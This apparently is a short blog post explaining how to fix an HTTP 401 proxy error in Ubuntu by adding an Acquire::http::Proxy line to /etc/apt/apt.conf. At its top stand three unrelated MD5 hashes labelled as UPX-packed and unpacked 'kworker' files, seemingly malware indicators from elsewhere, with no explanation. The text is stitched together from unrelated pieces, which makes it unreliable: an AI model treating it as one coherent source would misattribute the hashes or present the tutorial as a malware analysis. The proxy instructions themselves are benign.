    483b322b42835227d98f523f9df5c6fc  kworker (upx packed)
    4fa4269b7ce44bfce5ef574e6a37c38f  kworker (upx unpacked)
    131df88b7d0b3e7a1c4d84c37e71fb60  kworker_na

    Configuring proxy for APT in Ubuntu

    Recently, I have a problem where when I tried to update Ubuntu package via apt-get, it shows HTTP 401 proxy error related.
    Just a note, I’m running the VM using my office network which has a proxy servers.

    From this site;

    APT configuration file method
    This method uses the apt.conf file which is found in your /etc/apt/ directory. This method is useful if you only want apt-get (and not other applications) to use a http-proxy permanently.
    On some installations there will be no apt-conf file set up. This procedure will either edit an existing apt-conf file or create a new apt-conf file.
    gksudo gedit /etc/apt/apt.conf
    Add this line to your /etc/apt/apt.conf file (substitute your details for yourproxyaddress and proxyport).
    Acquire::http::Proxy "http://username:[email protected]:proxyport";
    Save the apt.conf file.

    References :
    http://askubuntu.com/questions/257290/configure-proxy-for-apt
    http://askubuntu.com/questions/543616/why-does-add-apt-repository-now-fail-to-retrieve-keys-behind-my-proxy-server-bu